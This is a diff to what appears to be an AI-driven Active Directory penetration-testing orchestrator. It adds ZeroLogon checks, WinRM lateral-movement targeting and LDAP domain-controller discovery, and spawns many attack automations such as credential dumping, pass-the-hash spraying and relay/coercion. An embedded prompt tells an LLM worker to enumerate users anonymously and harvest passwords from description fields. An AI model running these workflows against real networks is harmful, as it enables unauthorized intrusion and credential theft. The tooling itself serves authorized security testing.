assert_eq!(work.dedup_key, "winrm:192.168.58.30"); + assert_eq!(work.target_ip, "192.168.58.30"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn winrm_service_detection_variations() { + let test_cases = vec![ + (vec!["5985/tcp http".to_string()], true), + (vec!["5986/tcp ssl/http".to_string()], true), + (vec!["winrm-service".to_string()], true), + (vec!["WinRM".to_string()], true), + (vec!["445/tcp smb".to_string()], false), + (vec!["3389/tcp rdp".to_string()], false), + ]; + + for (services, expected) in test_cases { + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert_eq!( + has_winrm, expected, + "Services {:?} should have winrm={expected}", + services + ); + } + } + + #[test] + fn domain_from_fabrikam_host() { + let hostname = "web01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn empty_services() { + let services: Vec = vec![]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(!has_winrm, "Empty services should not detect WinRM"); + } + + // --- collect_winrm_lateral_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_winrm_hosts_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["445/tcp smb".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_winrm_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "winrm:192.168.58.30"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_secretsdumped_host() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.mark_processed(DEDUP_WINRM_LATERAL, "winrm:192.168.58.30".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_hosts_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.hosts.push(make_host( + "192.168.58.31", + "web01.contoso.local", + vec!["5986/tcp ssl/http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.30")); + assert!(ips.contains(&"192.168.58.31")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential_bare_hostname() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + // Bare hostname -> empty domain -> falls back to first cred + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + } + let state = shared.read().await; + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + } +} diff --git a/ares-cli/src/orchestrator/automation/zerologon.rs b/ares-cli/src/orchestrator/automation/zerologon.rs new file mode 100644 index 00000000..128dd633 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/zerologon.rs @@ -0,0 +1,269 @@ +//! auto_zerologon -- check domain controllers for CVE-2020-1472 (ZeroLogon). +//! +//! ZeroLogon allows unauthenticated privilege escalation by exploiting a flaw +//! in the Netlogon protocol. Even on patched systems, the check is fast and +//! non-destructive. Dispatches `zerologon_check` (recon only, no exploit) +//! against each discovered DC once. +//! +//! If the check reports the DC is vulnerable, result processing will register +//! a "zerologon" vulnerability that other modules can act on. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_zerologon_work(state: &StateInner) -> Vec { + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| !state.is_processed(DEDUP_ZEROLOGON, dc_ip)) + .map(|(domain, dc_ip)| { + // Derive the DC hostname (NetBIOS name) from hosts or domain + let hostname = state + .hosts + .iter() + .find(|h| h.ip == *dc_ip) + .map(|h| h.hostname.clone()) + .unwrap_or_default(); + + ZerologonWork { + domain: domain.clone(), + dc_ip: dc_ip.clone(), + hostname, + } + }) + .collect() +} + +/// Monitors for domain controllers and dispatches ZeroLogon checks. +/// Interval: 45s. +pub async fn auto_zerologon(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("zerologon") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_zerologon_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "zerologon_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "hostname": item.hostname, + }); + + let priority = dispatcher.effective_priority("zerologon"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + dc = %item.dc_ip, + domain = %item.domain, + "ZeroLogon check dispatched (CVE-2020-1472)" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ZEROLOGON, item.dc_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ZEROLOGON, &item.dc_ip) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "ZeroLogon check deferred by throttler"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch ZeroLogon check"); + } + } + } + } +} + +struct ZerologonWork { + domain: String, + dc_ip: String, + hostname: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ZEROLOGON, "zerologon"); + } + + #[test] + fn dedup_key_is_dc_ip() { + // ZeroLogon dedup is by DC IP since we check each DC once + let dc_ip = "192.168.58.10"; + assert_eq!(dc_ip, "192.168.58.10"); + } + + #[test] + fn no_cred_required() { + // ZeroLogon check doesn't require credentials + let _payload = serde_json::json!({ + "technique": "zerologon_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "hostname": "dc01", + }); + } + + #[test] + fn hostname_extraction_empty_fallback() { + let hosts: Vec<(String, String)> = vec![]; + let dc_ip = "192.168.58.10"; + let hostname = hosts + .iter() + .find(|(ip, _)| ip == dc_ip) + .map(|(_, h)| h.clone()) + .unwrap_or_default(); + assert_eq!(hostname, ""); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_zerologon_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_dc() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_ZEROLOGON, "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed(DEDUP_ZEROLOGON, "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_resolves_hostname_from_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + } + + #[test] + fn collect_hostname_empty_when_host_not_found() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // No matching host in state.hosts + state + .hosts + .push(make_host("192.168.58.99", "other.contoso.local", false)); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].hostname, ""); + } + + #[test] + fn collect_no_credentials_still_produces_work() { + // ZeroLogon is unauthenticated, so no credentials needed + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + assert!(state.credentials.is_empty()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/automation_spawner.rs b/ares-cli/src/orchestrator/automation_spawner.rs index 8278ea53..c8be2896 100644 --- a/ares-cli/src/orchestrator/automation_spawner.rs +++ b/ares-cli/src/orchestrator/automation_spawner.rs @@ -48,6 +48,41 @@ pub(crate) fn spawn_automation_tasks( spawn_auto!(auto_mssql_exploitation); spawn_auto!(auto_gpo_abuse); spawn_auto!(auto_laps_extraction); + spawn_auto!(auto_ntlm_relay); + spawn_auto!(auto_nopac); + spawn_auto!(auto_zerologon); + spawn_auto!(auto_print_nightmare); + spawn_auto!(auto_smb_signing_detection); + spawn_auto!(auto_share_coercion); + spawn_auto!(auto_mssql_coercion); + spawn_auto!(auto_password_policy); + spawn_auto!(auto_gpp_sysvol); + spawn_auto!(auto_ntlmv1_downgrade); + spawn_auto!(auto_ldap_signing); + spawn_auto!(auto_webdav_detection); + spawn_auto!(auto_spooler_check); + spawn_auto!(auto_machine_account_quota); + spawn_auto!(auto_dfs_coercion); + spawn_auto!(auto_petitpotam_unauth); + spawn_auto!(auto_winrm_lateral); + spawn_auto!(auto_group_enumeration); + spawn_auto!(auto_localuser_spray); + spawn_auto!(auto_krbrelayup); + spawn_auto!(auto_searchconnector_coercion); + spawn_auto!(auto_lsassy_dump); + spawn_auto!(auto_rdp_lateral); + spawn_auto!(auto_foreign_group_enum); + spawn_auto!(auto_certipy_auth); + spawn_auto!(auto_golden_cert); + spawn_auto!(auto_sid_enumeration); + spawn_auto!(auto_dns_enum); + spawn_auto!(auto_domain_user_enum); + spawn_auto!(auto_pth_spray); + spawn_auto!(auto_certifried); + spawn_auto!(auto_dacl_abuse); + spawn_auto!(auto_smbclient_enum); + spawn_auto!(auto_acl_discovery); + spawn_auto!(auto_cross_forest_enum); info!(count = handles.len(), "Automation tasks spawned"); handles diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs index 7c9b5331..f673795e 100644 --- a/ares-cli/src/orchestrator/blue/investigation.rs +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -551,6 +551,7 @@ mod tests { steps: 10, tool_calls_dispatched: 5, discoveries: Vec::new(), + llm_findings: Vec::new(), tool_outputs: Vec::new(), }; match process_outcome(&outcome, "inv1") { @@ -573,6 +574,7 @@ mod tests { steps: 3, tool_calls_dispatched: 1, discoveries: Vec::new(), + llm_findings: Vec::new(), tool_outputs: Vec::new(), }; match process_outcome(&outcome, "inv1") { diff --git a/ares-cli/src/orchestrator/bootstrap.rs b/ares-cli/src/orchestrator/bootstrap.rs index bee94e47..7b3ae071 100644 --- a/ares-cli/src/orchestrator/bootstrap.rs +++ b/ares-cli/src/orchestrator/bootstrap.rs @@ -8,11 +8,12 @@ use crate::orchestrator::config::OrchestratorConfig; use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::task_queue::TaskQueue; -/// Probe target IPs on port 88 (Kerberos) then 389 (LDAP) to find a real DC. -/// Returns the first IP that accepts a TCP connection within 500ms. -pub(crate) async fn probe_dc_port(ips: &[String]) -> Option { - for port in [88u16, 389] { - for ip in ips { +/// Probe ALL target IPs on ports 88 (Kerberos) and 389 (LDAP) to find every DC. +/// Returns all IPs that accept a TCP connection within 500ms on either port. +pub(crate) async fn probe_all_dcs(ips: &[String]) -> Vec { + let mut dc_ips = Vec::new(); + for ip in ips { + for port in [88u16, 389] { let addr = format!("{ip}:{port}"); if let Ok(Ok(_)) = tokio::time::timeout( std::time::Duration::from_millis(500), @@ -21,11 +22,186 @@ pub(crate) async fn probe_dc_port(ips: &[String]) -> Option { .await { info!(ip = %ip, port = port, "DC probe: port open"); - return Some(ip.clone()); + dc_ips.push(ip.clone()); + break; // Found open port, skip remaining ports for this IP } } } - None + dc_ips +} + +/// Query a DC's LDAP rootDSE to discover its domain name. +/// +/// Sends a minimal anonymous LDAP SearchRequest for `defaultNamingContext`, +/// parses the DN response (e.g. `DC=child,DC=contoso,DC=local`), and +/// converts it to a domain name (`child.contoso.local`). +/// +/// Returns `None` if the connection fails, the DC doesn't respond, or the +/// response doesn't contain a parseable `defaultNamingContext`. +pub(crate) async fn query_dc_domain(ip: &str) -> Option { + use tokio::io::{AsyncReadExt, AsyncWriteExt}; + + // Pre-built LDAP SearchRequest: + // messageId=1, base="", scope=baseObject, filter=present(objectClass), + // attributes=[defaultNamingContext] + #[rustfmt::skip] + let ldap_request: &[u8] = &[ + 0x30, 0x3b, // SEQUENCE, length 59 + 0x02, 0x01, 0x01, // INTEGER messageId = 1 + 0x63, 0x36, // APPLICATION[3] SearchRequest, length 54 + 0x04, 0x00, // baseObject = "" + 0x0a, 0x01, 0x00, // scope = baseObject (0) + 0x0a, 0x01, 0x00, // derefAliases = neverDeref (0) + 0x02, 0x01, 0x00, // sizeLimit = 0 + 0x02, 0x01, 0x05, // timeLimit = 5 + 0x01, 0x01, 0x00, // typesOnly = false + 0x87, 0x0b, // present filter, length 11 + b'o', b'b', b'j', b'e', b'c', b't', b'C', b'l', b'a', b's', b's', + 0x30, 0x16, // attributes SEQUENCE, length 22 + 0x04, 0x14, // OCTET STRING, length 20 + b'd', b'e', b'f', b'a', b'u', b'l', b't', b'N', b'a', b'm', b'i', + b'n', b'g', b'C', b'o', b'n', b't', b'e', b'x', b't', + ]; + + let addr = format!("{ip}:389"); + let mut stream = match tokio::time::timeout( + std::time::Duration::from_millis(1000), + tokio::net::TcpStream::connect(&addr), + ) + .await + { + Ok(Ok(s)) => s, + _ => { + warn!(ip = %ip, "LDAP rootDSE: connection failed"); + return None; + } + }; + + if stream.write_all(ldap_request).await.is_err() { + return None; + } + + let mut buf = vec![0u8; 4096]; + let n = match tokio::time::timeout( + std::time::Duration::from_millis(2000), + stream.read(&mut buf), + ) + .await + { + Ok(Ok(n)) if n > 0 => n, + _ => return None, + }; + + let domain = parse_dn_from_ldap_response(&buf[..n]); + if let Some(ref d) = domain { + info!(ip = %ip, domain = %d, "LDAP rootDSE: discovered DC domain"); + } else { + warn!(ip = %ip, "LDAP rootDSE: could not parse defaultNamingContext"); + } + domain +} + +/// Parse `defaultNamingContext` DN from raw LDAP response bytes. +/// +/// Locates the `defaultNamingContext` attribute name, then finds the subsequent +/// DN value containing `DC=` components and converts it to a domain name. +/// +/// Uses the BER OCTET STRING length prefix immediately preceding the `DC=` +/// payload as the authoritative end-of-DN marker. Without this, a printable-byte +/// scan would happily consume the next BER tag (0x30 SEQUENCE = ASCII '0'), +/// producing phantom domains like `contoso.local0` that poison downstream state. +fn parse_dn_from_ldap_response(data: &[u8]) -> Option { + let attr_name = b"defaultNamingContext"; + let pos = data.windows(attr_name.len()).position(|w| w == attr_name)?; + + // After the attribute name, scan forward for "DC=" which starts the DN value + let remaining = &data[pos + attr_name.len()..]; + let dc_pos = remaining + .windows(3) + .position(|w| w.eq_ignore_ascii_case(b"DC="))?; + + let dn_start = pos + attr_name.len() + dc_pos; + + // Prefer the BER OCTET STRING length prefix (the byte immediately before + // `DC=`) for the DN length. Short-form only (high bit clear, non-zero). + let mut dn_end = dn_start; + if dc_pos > 0 { + let length_byte = remaining[dc_pos - 1]; + if length_byte & 0x80 == 0 && length_byte > 0 { + let length = length_byte as usize; + if let Some(end) = dn_start.checked_add(length) { + if end <= data.len() { + dn_end = end; + } + } + } + } + + // Fallback: walk only DN-legal characters (alphanumeric, `=`, `,`, `-`). + // Stops before BER tag bytes (e.g. 0x30) that happen to be ASCII printable. + if dn_end == dn_start { + dn_end = dn_start; + while dn_end < data.len() { + let b = data[dn_end]; + let is_dn_char = b.is_ascii_alphanumeric() || matches!(b, b'=' | b',' | b'-' | b'.'); + if !is_dn_char { + break; + } + dn_end += 1; + } + } + + let dn_str = std::str::from_utf8(&data[dn_start..dn_end]).ok()?; + dn_to_domain(dn_str) +} + +/// Convert an LDAP DN like `DC=child,DC=contoso,DC=local` to `child.contoso.local`. +fn dn_to_domain(dn: &str) -> Option { + let parts: Vec<&str> = dn + .split(',') + .filter_map(|component| { + let component = component.trim(); + if component.len() > 3 && component[..3].eq_ignore_ascii_case("DC=") { + Some(&component[3..]) + } else { + None + } + }) + .collect(); + + if parts.is_empty() { + return None; + } + Some(parts.join(".").to_lowercase()) +} + +/// Discover all DCs and their domains from target IPs. +/// +/// 1. Probes all IPs on ports 88/389 to find DCs +/// 2. Queries each DC's LDAP rootDSE to discover its actual domain +/// 3. Falls back to `fallback_domain` if LDAP query fails +/// +/// Returns `Vec<(domain, ip)>` with one entry per unique domain. +pub(crate) async fn discover_dc_domains( + ips: &[String], + fallback_domain: &str, +) -> Vec<(String, String)> { + let dc_ips = probe_all_dcs(ips).await; + let mut results = Vec::new(); + let mut seen_domains = std::collections::HashSet::new(); + + for ip in &dc_ips { + let domain = query_dc_domain(ip) + .await + .unwrap_or_else(|| fallback_domain.to_lowercase()); + + // First DC for each domain wins — skip duplicates (e.g. redundant DCs) + if seen_domains.insert(domain.clone()) { + results.push((domain, ip.clone())); + } + } + + results } /// Write initial operation metadata to Redis so workers can discover the operation. @@ -144,11 +320,43 @@ pub(crate) async fn dispatch_initial_recon( let payload = serde_json::json!({ "target_ip": ip, "domain": domain, + "technique": "user_enumeration", "techniques": ["user_enumeration"], "null_session": true, + "instructions": concat!( + "Enumerate domain users via UNAUTHENTICATED methods. This is a bootstrap task ", + "— we have NO credentials yet. Try these techniques in order:\n\n", + "1. Anonymous LDAP bind to enumerate users and their descriptions:\n", + " ldapsearch -x -H ldap:// -b 'DC=' ", + "'(objectClass=user)' sAMAccountName description userPrincipalName\n\n", + "2. RPC null session user enumeration:\n", + " rpcclient -U '' -N -c 'enumdomusers'\n", + " Then for each user: rpcclient -U '' -N -c 'queryuser '\n\n", + "3. Impacket lookupsid.py with anonymous:\n", + " lookupsid.py anonymous@ -no-pass -domain-sids\n\n", + "4. Impacket GetADUsers.py with anonymous:\n", + " GetADUsers.py -all -dc-ip / 2>/dev/null\n\n", + "5. enum4linux-ng for comprehensive SMB/RPC enumeration:\n", + " enum4linux-ng -A \n\n", + "CRITICAL: Look for passwords in user DESCRIPTION fields! In many AD environments, ", + "admins store passwords in the description attribute. For each user found, report ", + "the description field content. If a description looks like a password (short string, ", + "special chars, etc.), report it as a discovered credential:\n", + " {\"username\": \"samaccountname\", \"password\": \"\", ", + "\"domain\": \"\", \"source\": \"desc_enumeration\"}\n\n", + "IMPORTANT: The 'domain' field for credentials and users MUST be the AD domain the user ", + "belongs to (look at userPrincipalName suffix, or the domain reported by LDAP/RPC), NOT ", + "the local machine name or workgroup. If the target is a DC for 'contoso.local', ", + "users belong to 'contoso.local'. Use the 'domain' field from this task's payload ", + "as the default domain unless evidence shows otherwise.\n\n", + "Also report ALL discovered users in the discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"\", ", + "\"source\": \"user_enumeration\"}\n\n", + "If the target is not a DC (no LDAP/Kerberos), just report that and complete." + ), }); match dispatcher - .throttled_submit("recon", "recon", payload, 5) + .throttled_submit("recon", "recon", payload, 1) .await { Ok(Some(task_id)) => { @@ -162,3 +370,142 @@ pub(crate) async fn dispatch_initial_recon( count } + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dn_to_domain_child() { + assert_eq!( + dn_to_domain("DC=child,DC=contoso,DC=local"), + Some("child.contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_root() { + assert_eq!( + dn_to_domain("DC=contoso,DC=local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_single_component() { + assert_eq!(dn_to_domain("DC=local"), Some("local".to_string())); + } + + #[test] + fn dn_to_domain_case_insensitive() { + assert_eq!( + dn_to_domain("dc=CONTOSO,dc=LOCAL"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_with_spaces() { + assert_eq!( + dn_to_domain("DC=child, DC=contoso, DC=local"), + Some("child.contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_mixed_components() { + // DN with OU components should only extract DC parts + assert_eq!( + dn_to_domain("OU=Users,DC=contoso,DC=local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_empty() { + assert_eq!(dn_to_domain(""), None); + } + + #[test] + fn dn_to_domain_no_dc() { + assert_eq!(dn_to_domain("OU=Users,CN=admin"), None); + } + + #[test] + fn parse_dn_from_ldap_response_realistic() { + // Simulate a response containing the attribute name followed by a BER-encoded value + let mut data = Vec::new(); + data.extend_from_slice(b"\x30\x50\x02\x01\x01\x64\x4b"); // LDAP envelope + data.extend_from_slice(b"\x04\x00"); // objectName="" + data.extend_from_slice(b"\x30\x45"); // attributes SEQUENCE + data.extend_from_slice(b"\x30\x43"); // partial attribute SEQUENCE + data.extend_from_slice(b"\x04\x14"); // type OCTET STRING, len 20 + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x29"); // vals SET, len 41 + data.extend_from_slice(b"\x04\x27"); // value OCTET STRING, len 39 + data.extend_from_slice(b"DC=child,DC=contoso,DC=local"); + data.push(0x00); // null terminator (end of printable range) + + assert_eq!( + parse_dn_from_ldap_response(&data), + Some("child.contoso.local".to_string()) + ); + } + + #[test] + fn parse_dn_from_ldap_response_root_domain() { + let mut data = Vec::new(); + data.extend_from_slice(b"\x30\x40\x02\x01\x01\x64\x3b"); + data.extend_from_slice(b"\x04\x00"); + data.extend_from_slice(b"\x30\x35\x30\x33"); + data.extend_from_slice(b"\x04\x14"); + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x19\x04\x17"); + data.extend_from_slice(b"DC=contoso,DC=local"); + data.push(0x00); + + assert_eq!( + parse_dn_from_ldap_response(&data), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn parse_dn_from_ldap_response_no_attr() { + let data = b"\x30\x10\x02\x01\x01\x04\x0bsomethingElse"; + assert_eq!(parse_dn_from_ldap_response(data), None); + } + + #[test] + fn parse_dn_from_ldap_response_no_dc() { + let mut data = Vec::new(); + data.extend_from_slice(b"\x04\x14"); + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x0a\x04\x08"); + data.extend_from_slice(b"OU=Users"); // No DC= in value + data.push(0x00); + + assert_eq!(parse_dn_from_ldap_response(&data), None); + } + + /// Regression: the OCTET STRING value MUST be bounded by its BER length + /// prefix. Without that bound, a printable-byte scan happily consumes the + /// next BER SEQUENCE tag (0x30 = ASCII '0'), producing phantom domains + /// like `contoso.local0` that poison the orchestrator's `domain_controllers` + /// keys and make the completion loop's required-forest set unsatisfiable. + #[test] + fn parse_dn_from_ldap_response_does_not_bleed_into_next_ber_tag() { + let mut data = Vec::new(); + data.extend_from_slice(b"\x04\x14"); + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x15\x04\x13"); // SET len 21, OCTET STRING len 19 + data.extend_from_slice(b"DC=contoso,DC=local"); // exactly 19 bytes + data.extend_from_slice(b"\x30\x10"); // next SEQUENCE: tag 0x30 ('0'), len 0x10 + data.extend_from_slice(b"trailingjunk"); + + assert_eq!( + parse_dn_from_ldap_response(&data), + Some("contoso.local".to_string()) + ); + } +} diff --git a/ares-cli/src/orchestrator/callback_handler/dispatch.rs b/ares-cli/src/orchestrator/callback_handler/dispatch.rs index 5384e179..ccf0bb52 100644 --- a/ares-cli/src/orchestrator/callback_handler/dispatch.rs +++ b/ares-cli/src/orchestrator/callback_handler/dispatch.rs @@ -102,6 +102,42 @@ impl OrchestratorCallbackHandler { attack_step: 0, }; + // Pre-check cross-realm so the LLM gets a clear "dead-end" message + // rather than a misleading "queued" when request_lateral silently rejects. + let target_realm = { + let state = self.state.read().await; + state + .hosts + .iter() + .find(|h| h.ip == target_ip) + .and_then(|h| h.hostname.split_once('.').map(|(_, d)| d.to_lowercase())) + }; + if let Some(td) = target_realm { + let cd = domain.to_lowercase(); + if !cd.is_empty() + && cd != td + && !td.ends_with(&format!(".{cd}")) + && !cd.ends_with(&format!(".{td}")) + { + warn!( + target_ip = target_ip, + target_realm = %td, + cred_domain = %cd, + cred_user = username, + technique = technique, + "Rejecting cross-realm lateral from LLM — returning dead-end message" + ); + return Ok(CallbackResult::Continue(format!( + "REJECTED: cross-realm lateral movement ({cd} cred → {td} target at {target_ip}) \ + will not work. Windows strips ExtraSid RID<1000 across forests, and same-realm \ + auth is required for SMB/WMI/PSExec. DO NOT retry this combination with any \ + {technique}/pth_*/smbexec/wmiexec/psexec variant. Instead: dispatch \ + forest_trust_escalation, exploit ESC8/MSSQL/ACL paths to acquire a \ + {td}-realm credential, or pivot via FSP membership." + ))); + } + } + let task_id = dispatcher .request_lateral(target_ip, &cred, technique) .await?; diff --git a/ares-cli/src/orchestrator/completion.rs b/ares-cli/src/orchestrator/completion.rs index 32cc293a..71f6f730 100644 --- a/ares-cli/src/orchestrator/completion.rs +++ b/ares-cli/src/orchestrator/completion.rs @@ -102,6 +102,16 @@ pub async fn undominated_forests(state: &SharedState) -> Vec { ) } +/// Redis-authoritative count of red-team tasks still pending completion. +async fn redis_pending_red_tasks(dispatcher: &Arc) -> Result { + let key = ares_core::state::build_key( + &dispatcher.config.operation_id, + ares_core::state::KEY_PENDING_TASKS, + ); + let mut conn = dispatcher.queue.connection(); + 